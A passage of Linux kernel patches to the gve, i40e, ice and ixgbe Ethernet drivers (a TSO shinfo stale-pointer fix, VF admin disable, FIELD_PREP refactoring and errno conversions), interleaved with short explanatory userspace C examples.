+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -350,6 +350,7 @@ static void gve_tx_fill_pkt_desc_dqo(struct gve_tx_ring *tx, u32 *desc_idx,
+ /* Validates and prepares `skb` for TSO.
+  *
+  * Returns header length, or < 0 if invalid.
++ * Warning: might change skb->head (and thus skb_shinfo).
+  */
+ static int gve_prep_tso(struct sk_buff *skb)
+ {
+@@ -451,8 +452,8 @@ gve_tx_fill_general_ctx_desc(struct gve_tx_general_context_desc_dqo *desc,
+ static int gve_tx_add_skb_no_copy_dqo(struct gve_tx_ring *tx,
+ 				      struct sk_buff *skb)
+ {
+-	const struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 	const bool is_gso = skb_is_gso(skb);
++	struct skb_shared_info *shinfo;
+ 	u32 desc_idx = tx->dqo_tx.tail;
+ 
+ 	struct gve_tx_pending_packet_dqo *pkt;
+@@ -477,6 +478,8 @@ static int gve_tx_add_skb_no_copy_dqo(struct gve_tx_ring *tx,
+ 		desc_idx = (desc_idx + 1) & tx->mask;
+ 	}
+ 
++	/* Must be read after gve_prep_tso(), which can change shinfo. */
++	shinfo = skb_shinfo(skb);
+ 	gve_tx_fill_general_ctx_desc(&tx->dqo.tx_ring[desc_idx].general_ctx,
+ 				     &metadata);
+ 	desc_idx = (desc_idx + 1) & tx->mask;
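/*
 * Editor's note: a userspace demonstration of the bug class the gve hunk
 * above fixes. If a helper may reallocate the underlying buffer (as
 * gve_prep_tso() may change skb->head), any pointer derived from it before
 * the call is stale and must be re-derived afterwards.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int grow(char **buf, size_t n)
{
	char *p = realloc(*buf, n);	/* may move the allocation */

	if (!p)
		return -1;
	*buf = p;
	return 0;
}

int main(void)
{
	char *buf = malloc(8);

	if (!buf)
		return 1;
	strcpy(buf, "hdr");

	char *hdr = buf;		/* pointer derived before the call */

	if (grow(&buf, 1 << 20) == 0)
		hdr = buf;		/* re-derive after, as the patch
					 * re-reads skb_shinfo(skb) */
	printf("%s\n", hdr);
	free(buf);
	return 0;
}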
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index c7d761426d6ce..3d3db58090ed1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -2603,6 +2603,14 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	int aq_ret = 0;
+ 	int i;
+ 
++	if (vf->is_disabled_from_host) {
++		aq_ret = -EPERM;
++		dev_info(&pf->pdev->dev,
++			 "Admin has disabled VF %d, will not enable queues\n",
++			 vf->vf_id);
++		goto error_param;
++	}
++
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+ 		aq_ret = I40E_ERR_PARAM;
+ 		goto error_param;
+@@ -4656,9 +4664,12 @@ int i40e_ndo_set_vf_link_state(struct net_device *netdev, int vf_id, int link)
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	struct virtchnl_pf_event pfe;
+ 	struct i40e_hw *hw = &pf->hw;
++	struct i40e_vsi *vsi;
++	unsigned long q_map;
+ 	struct i40e_vf *vf;
+ 	int abs_vf_id;
+ 	int ret = 0;
++	int tmp;
+ 
+ 	if (test_and_set_bit(__I40E_VIRTCHNL_OP_PENDING, pf->state)) {
+ 		dev_warn(&pf->pdev->dev, "Unable to configure VFs, other operation is pending.\n");
+@@ -4681,17 +4692,38 @@ int i40e_ndo_set_vf_link_state(struct net_device *netdev, int vf_id, int link)
+ 	switch (link) {
+ 	case IFLA_VF_LINK_STATE_AUTO:
+ 		vf->link_forced = false;
++		vf->is_disabled_from_host = false;
++		/* reset needed to reinit VF resources */
++		i40e_vc_reset_vf(vf, true);
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
+ 		break;
+ 	case IFLA_VF_LINK_STATE_ENABLE:
+ 		vf->link_forced = true;
+ 		vf->link_up = true;
++		vf->is_disabled_from_host = false;
++		/* reset needed to reinit VF resources */
++		i40e_vc_reset_vf(vf, true);
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
+ 		break;
+ 	case IFLA_VF_LINK_STATE_DISABLE:
+ 		vf->link_forced = true;
+ 		vf->link_up = false;
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
++
++		vsi = pf->vsi[vf->lan_vsi_idx];
++		q_map = BIT(vsi->num_queue_pairs) - 1;
++
++		vf->is_disabled_from_host = true;
++
++		/* Try to stop both Tx and Rx rings even if one of the calls fails,
++		 * to ensure we stop the rings even in case of errors.
++		 * If either returns an error, the first error that
++		 * occurred will be returned.
++		 */
++		tmp = i40e_ctrl_vf_tx_rings(vsi, q_map, false);
++		ret = i40e_ctrl_vf_rx_rings(vsi, q_map, false);
++
++		ret = tmp ? tmp : ret;
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+index bd497cc5303a1..97e9c34d7c6cd 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+@@ -98,6 +98,7 @@ struct i40e_vf {
+ 	bool link_forced;
+ 	bool link_up;		/* only valid if VF link is forced */
+ 	bool spoofchk;
++	bool is_disabled_from_host; /* PF ctrl of VF enable/disable */
+ 	u16 num_vlan;
+ 
+ 	/* ADq related variables */
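/*
 * Editor's note: the i40e hunk above stops both Tx and Rx rings even when
 * one call fails, then reports the first failure. A compact sketch of that
 * "run both, keep the first error" idiom (return values are made up):
 */
#include <stdio.h>

static int stop_tx(void) { return -5; }	/* pretend Tx stop fails (-EIO) */
static int stop_rx(void) { return 0; }

int main(void)
{
	int tmp = stop_tx();	/* always attempt both ... */
	int ret = stop_rx();

	ret = tmp ? tmp : ret;	/* ... but report the first error seen */
	printf("ret=%d\n", ret);
	return 0;
}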
+diff --git a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+index 1bdc70aa979dc..fe48164dce1e1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
++++ b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+@@ -413,10 +413,10 @@ struct ice_aqc_vsi_props {
+ #define ICE_AQ_VSI_INNER_VLAN_INSERT_PVID	BIT(2)
+ #define ICE_AQ_VSI_INNER_VLAN_EMODE_S		3
+ #define ICE_AQ_VSI_INNER_VLAN_EMODE_M		(0x3 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH	(0x0 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_UP	(0x1 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR		(0x2 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING	(0x3 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH	0x0U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_UP	0x1U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR		0x2U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING	0x3U
+ 	u8 inner_vlan_reserved2[3];
+ 	/* ingress egress up sections */
+ 	__le32 ingress_table; /* bitmap, 3 bits per up */
+@@ -482,11 +482,11 @@ struct ice_aqc_vsi_props {
+ #define ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_S		2
+ #define ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_M		(0xF << ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_S)
+ #define ICE_AQ_VSI_Q_OPT_RSS_HASH_S		6
+-#define ICE_AQ_VSI_Q_OPT_RSS_HASH_M		(0x3 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_TPLZ		(0x0 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_SYM_TPLZ		(0x1 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_XOR		(0x2 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_JHASH		(0x3 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_M		GENMASK(7, 6)
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ		0x0U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_SYM_TPLZ	0x1U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_XOR		0x2U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_JHASH		0x3U
+ 	u8 q_opt_tc;
+ #define ICE_AQ_VSI_Q_OPT_TC_OVR_S		0
+ #define ICE_AQ_VSI_Q_OPT_TC_OVR_M		(0x1F << ICE_AQ_VSI_Q_OPT_TC_OVR_S)
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index c051503c3a892..cc6c04a69b285 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -878,7 +878,8 @@ static void ice_set_dflt_vsi_ctx(struct ice_hw *hw, struct ice_vsi_ctx *ctxt)
+ 	 */
+ 	if (ice_is_dvm_ena(hw)) {
+ 		ctxt->info.inner_vlan_flags |=
+-			ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING;
++			FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				   ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING);
+ 		ctxt->info.outer_vlan_flags =
+ 			(ICE_AQ_VSI_OUTER_VLAN_TX_MODE_ALL <<
+ 			 ICE_AQ_VSI_OUTER_VLAN_TX_MODE_S) &
+@@ -1085,12 +1086,12 @@ static void ice_set_rss_vsi_ctx(struct ice_vsi_ctx *ctxt, struct ice_vsi *vsi)
+ 	case ICE_VSI_PF:
+ 		/* PF VSI will inherit RSS instance of PF */
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_PF;
+-		hash_type = ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 		break;
+ 	case ICE_VSI_VF:
+ 		/* VF VSI will get a small RSS table which is a VSI LUT type */
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_VSI;
+-		hash_type = ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 		break;
+ 	default:
+ 		dev_dbg(dev, "Unsupported VSI type %s\n",
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 2b4c791b6cbad..6c03ebf81ffda 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -817,8 +817,8 @@ static int ice_vc_handle_rss_cfg(struct ice_vf *vf, u8 *msg, bool add)
+ 		int status;
+ 
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_VSI;
+-		hash_type = add ? ICE_AQ_VSI_Q_OPT_RSS_XOR :
+-				ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = add ? ICE_AQ_VSI_Q_OPT_RSS_HASH_XOR :
++				ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 
+ 		ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 		if (!ctx) {
+@@ -826,11 +826,9 @@ static int ice_vc_handle_rss_cfg(struct ice_vf *vf, u8 *msg, bool add)
+ 			goto error_param;
+ 		}
+ 
+-		ctx->info.q_opt_rss = ((lut_type <<
+-					ICE_AQ_VSI_Q_OPT_RSS_LUT_S) &
+-				       ICE_AQ_VSI_Q_OPT_RSS_LUT_M) |
+-				       (hash_type &
+-					ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
++		ctx->info.q_opt_rss =
++			FIELD_PREP(ICE_AQ_VSI_Q_OPT_RSS_LUT_M, lut_type) |
++			FIELD_PREP(ICE_AQ_VSI_Q_OPT_RSS_HASH_M, hash_type);
+ 
+ 		/* Preserve existing queueing option setting */
+ 		ctx->info.q_opt_rss |= (vsi->info.q_opt_rss &
+diff --git a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+index 5b4a0abb46077..239266e9d5f12 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+@@ -131,6 +131,7 @@ static int ice_vsi_manage_vlan_stripping(struct ice_vsi *vsi, bool ena)
+ {
+ 	struct ice_hw *hw = &vsi->back->hw;
+ 	struct ice_vsi_ctx *ctxt;
++	u8 *ivf;
+ 	int err;
+ 
+ 	/* do not allow modifying VLAN stripping when a port VLAN is configured
+@@ -143,19 +144,24 @@ static int ice_vsi_manage_vlan_stripping(struct ice_vsi *vsi, bool ena)
+ 	if (!ctxt)
+ 		return -ENOMEM;
+ 
++	ivf = &ctxt->info.inner_vlan_flags;
++
+ 	/* Here we are configuring what the VSI should do with the VLAN tag in
+ 	 * the Rx packet. We can either leave the tag in the packet or put it in
+ 	 * the Rx descriptor.
+ 	 */
+-	if (ena)
++	if (ena) {
+ 		/* Strip VLAN tag from Rx packet and put it in the desc */
+-		ctxt->info.inner_vlan_flags = ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH;
+-	else
++		*ivf = FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				  ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH);
++	} else {
+ 		/* Disable stripping. Leave tag in packet */
+-		ctxt->info.inner_vlan_flags = ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING;
++		*ivf = FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				  ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING);
++	}
+ 
+ 	/* Allow all packets untagged/tagged */
+-	ctxt->info.inner_vlan_flags |= ICE_AQ_VSI_INNER_VLAN_TX_MODE_ALL;
++	*ivf |= ICE_AQ_VSI_INNER_VLAN_TX_MODE_ALL;
+ 
+ 	ctxt->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_VLAN_VALID);
+ 
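/*
 * Editor's note: a simplified userspace model of the GENMASK()/FIELD_PREP()
 * helpers the ice hunks above switch to (the real ones live in
 * <linux/bits.h> and <linux/bitfield.h> and add compile-time checking).
 * The point of the conversion: define field *values* as plain 0..n and let
 * the mask carry the shift, instead of baking the shift into every #define.
 */
#include <stdio.h>
#include <stdint.h>

#define GENMASK(h, l)	(((~0u) >> (31 - (h))) & ((~0u) << (l)))
/* shift the value into place by the mask's lowest set bit */
#define FIELD_PREP(mask, val) \
	(((uint32_t)(val) << __builtin_ctz(mask)) & (mask))

#define VLAN_EMODE_M		GENMASK(4, 3)
#define VLAN_EMODE_NOTHING	0x3u	/* plain value, no shift baked in */

int main(void)
{
	uint32_t flags = FIELD_PREP(VLAN_EMODE_M, VLAN_EMODE_NOTHING);

	printf("flags=0x%02x\n", flags);	/* 0x18, i.e. 0x3 << 3 */
	return 0;
}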
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
+index 100388968e4db..3d56481e16bc9 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
+@@ -123,14 +123,14 @@ static s32 ixgbe_init_phy_ops_82598(struct ixgbe_hw *hw)
+ 		if (ret_val)
+ 			return ret_val;
+ 		if (hw->phy.sfp_type == ixgbe_sfp_type_unknown)
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 
+ 		/* Check to see if SFP+ module is supported */
+ 		ret_val = ixgbe_get_sfp_init_sequence_offsets(hw,
+ 							    &list_offset,
+ 							    &data_offset);
+ 		if (ret_val)
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		break;
+ 	default:
+ 		break;
+@@ -213,7 +213,7 @@ static s32 ixgbe_get_link_capabilities_82598(struct ixgbe_hw *hw,
+ 		break;
+ 
+ 	default:
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -283,7 +283,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 
+ 	/* Validate the water mark configuration */
+ 	if (!hw->fc.pause_time)
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 
+ 	/* Low water mark of zero causes XOFF floods */
+ 	for (i = 0; i < MAX_TRAFFIC_CLASS; i++) {
+@@ -292,7 +292,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 			if (!hw->fc.low_water[i] ||
+ 			    hw->fc.low_water[i] >= hw->fc.high_water[i]) {
+ 				hw_dbg(hw, "Invalid water mark configuration\n");
+-				return IXGBE_ERR_INVALID_LINK_SETTINGS;
++				return -EINVAL;
+ 			}
+ 		}
+ 	}
+@@ -369,7 +369,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Set 802.3x based flow control settings. */
+@@ -438,7 +438,7 @@ static s32 ixgbe_start_mac_link_82598(struct ixgbe_hw *hw,
+ 				msleep(100);
+ 			}
+ 			if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-				status = IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++				status = -EIO;
+ 				hw_dbg(hw, "Autonegotiation did not complete.\n");
+ 			}
+ 		}
+@@ -478,7 +478,7 @@ static s32 ixgbe_validate_link_ready(struct ixgbe_hw *hw)
+ 
+ 	if (timeout == IXGBE_VALIDATE_LINK_READY_TIMEOUT) {
+ 		hw_dbg(hw, "Link was indicated but link is down\n");
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -594,7 +594,7 @@ static s32 ixgbe_setup_mac_link_82598(struct ixgbe_hw *hw,
+ 	speed &= link_capabilities;
+ 
+ 	if (speed == IXGBE_LINK_SPEED_UNKNOWN)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 
+ 	/* Set KX4/KX support according to speed requested */
+ 	else if (link_mode == IXGBE_AUTOC_LMS_KX4_AN ||
+@@ -701,9 +701,9 @@ static s32 ixgbe_reset_hw_82598(struct ixgbe_hw *hw)
+ 
+ 		/* Init PHY and function pointers, perform SFP setup */
+ 		phy_status = hw->phy.ops.init(hw);
+-		if (phy_status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++		if (phy_status == -EOPNOTSUPP)
+ 			return phy_status;
+-		if (phy_status == IXGBE_ERR_SFP_NOT_PRESENT)
++		if (phy_status == -ENOENT)
+ 			goto mac_reset_top;
+ 
+ 		hw->phy.ops.reset(hw);
+@@ -727,7 +727,7 @@ mac_reset_top:
+ 		udelay(1);
+ 	}
+ 	if (ctrl & IXGBE_CTRL_RST) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -789,7 +789,7 @@ static s32 ixgbe_set_vmdq_82598(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	rar_high = IXGBE_READ_REG(hw, IXGBE_RAH(rar));
+@@ -814,7 +814,7 @@ static s32 ixgbe_clear_vmdq_82598(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	rar_high = IXGBE_READ_REG(hw, IXGBE_RAH(rar));
+@@ -845,7 +845,7 @@ static s32 ixgbe_set_vfta_82598(struct ixgbe_hw *hw, u32 vlan, u32 vind,
+ 	u32 vftabyte;
+ 
+ 	if (vlan > 4095)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Determine 32-bit word position in array */
+ 	regindex = (vlan >> 5) & 0x7F;   /* upper seven bits */
+@@ -964,7 +964,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 		gssr = IXGBE_GSSR_PHY0_SM;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, gssr) != 0)
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	if (hw->phy.type == ixgbe_phy_nl) {
+ 		/*
+@@ -993,7 +993,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 
+ 		if (sfp_stat != IXGBE_I2C_EEPROM_STATUS_PASS) {
+ 			hw_dbg(hw, "EEPROM read did not pass.\n");
+-			status = IXGBE_ERR_SFP_NOT_PRESENT;
++			status = -ENOENT;
+ 			goto out;
+ 		}
+ 
+@@ -1003,7 +1003,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 
+ 		*eeprom_data = (u8)(sfp_data >> 8);
+ 	} else {
+-		status = IXGBE_ERR_PHY;
++		status = -EIO;
+ 	}
+ 
+ out:
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
+index 58ea959a44822..339e106a5732d 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
+@@ -117,7 +117,7 @@ static s32 ixgbe_setup_sfp_modules_82599(struct ixgbe_hw *hw)
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 							IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		if (hw->eeprom.ops.read(hw, ++data_offset, &data_value))
+ 			goto setup_sfp_err;
+@@ -144,7 +144,7 @@ static s32 ixgbe_setup_sfp_modules_82599(struct ixgbe_hw *hw)
+ 
+ 		if (ret_val) {
+ 			hw_dbg(hw, " sfp module setup not complete\n");
+-			return IXGBE_ERR_SFP_SETUP_NOT_COMPLETE;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -159,7 +159,7 @@ setup_sfp_err:
+ 	usleep_range(hw->eeprom.semaphore_delay * 1000,
+ 		     hw->eeprom.semaphore_delay * 2000);
+ 	hw_err(hw, "eeprom read at offset %d failed\n", data_offset);
+-	return IXGBE_ERR_SFP_SETUP_NOT_COMPLETE;
++	return -EIO;
+ }
+ 
+ /**
+@@ -184,7 +184,7 @@ static s32 prot_autoc_read_82599(struct ixgbe_hw *hw, bool *locked,
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 					IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		*locked = true;
+ 	}
+@@ -219,7 +219,7 @@ static s32 prot_autoc_write_82599(struct ixgbe_hw *hw, u32 autoc, bool locked)
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 					IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		locked = true;
+ 	}
+@@ -400,7 +400,7 @@ static s32 ixgbe_get_link_capabilities_82599(struct ixgbe_hw *hw,
+ 		break;
+ 
+ 	default:
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	if (hw->phy.multispeed_fiber) {
+@@ -541,7 +541,7 @@ static s32 ixgbe_start_mac_link_82599(struct ixgbe_hw *hw,
+ 				msleep(100);
+ 			}
+ 			if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-				status = IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++				status = -EIO;
+ 				hw_dbg(hw, "Autoneg did not complete.\n");
+ 			}
+ 		}
+@@ -794,7 +794,7 @@ static s32 ixgbe_setup_mac_link_82599(struct ixgbe_hw *hw,
+ 	speed &= link_capabilities;
+ 
+ 	if (speed == IXGBE_LINK_SPEED_UNKNOWN)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 
+ 	/* Use stored value (EEPROM defaults) of AUTOC to find KR/KX4 support*/
+ 	if (hw->mac.orig_link_settings_stored)
+@@ -861,8 +861,7 @@ static s32 ixgbe_setup_mac_link_82599(struct ixgbe_hw *hw,
+ 					msleep(100);
+ 				}
+ 				if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-					status =
+-						IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++					status = -EIO;
+ 					hw_dbg(hw, "Autoneg did not complete.\n");
+ 				}
+ 			}
+@@ -927,7 +926,7 @@ static s32 ixgbe_reset_hw_82599(struct ixgbe_hw *hw)
+ 	/* Identify PHY and related function pointers */
+ 	status = hw->phy.ops.init(hw);
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Setup SFP module if there is one present. */
+@@ -936,7 +935,7 @@ static s32 ixgbe_reset_hw_82599(struct ixgbe_hw *hw)
+ 		hw->phy.sfp_setup_needed = false;
+ 	}
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Reset PHY */
+@@ -974,7 +973,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -1093,7 +1092,7 @@ static s32 ixgbe_fdir_check_cmd_complete(struct ixgbe_hw *hw, u32 *fdircmd)
+ 		udelay(10);
+ 	}
+ 
+-	return IXGBE_ERR_FDIR_CMD_INCOMPLETE;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1155,7 +1154,7 @@ s32 ixgbe_reinit_fdir_tables_82599(struct ixgbe_hw *hw)
+ 	}
+ 	if (i >= IXGBE_FDIR_INIT_DONE_POLL) {
+ 		hw_dbg(hw, "Flow Director Signature poll time exceeded!\n");
+-		return IXGBE_ERR_FDIR_REINIT_FAILED;
++		return -EIO;
+ 	}
+ 
+ 	/* Clear FDIR statistics registers (read to clear) */
+@@ -1387,7 +1386,7 @@ s32 ixgbe_fdir_add_signature_filter_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flow type input\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* configure FDIRCMD register */
+@@ -1546,7 +1545,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on vm pool mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (input_mask->formatted.flow_type & IXGBE_ATR_L4TYPE_MASK) {
+@@ -1555,14 +1554,14 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		if (input_mask->formatted.dst_port ||
+ 		    input_mask->formatted.src_port) {
+ 			hw_dbg(hw, " Error on src/dst port mask\n");
+-			return IXGBE_ERR_CONFIG;
++			return -EIO;
+ 		}
+ 		break;
+ 	case IXGBE_ATR_L4TYPE_MASK:
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flow type mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (ntohs(input_mask->formatted.vlan_id) & 0xEFFF) {
+@@ -1583,7 +1582,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on VLAN mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch ((__force u16)input_mask->formatted.flex_bytes & 0xFFFF) {
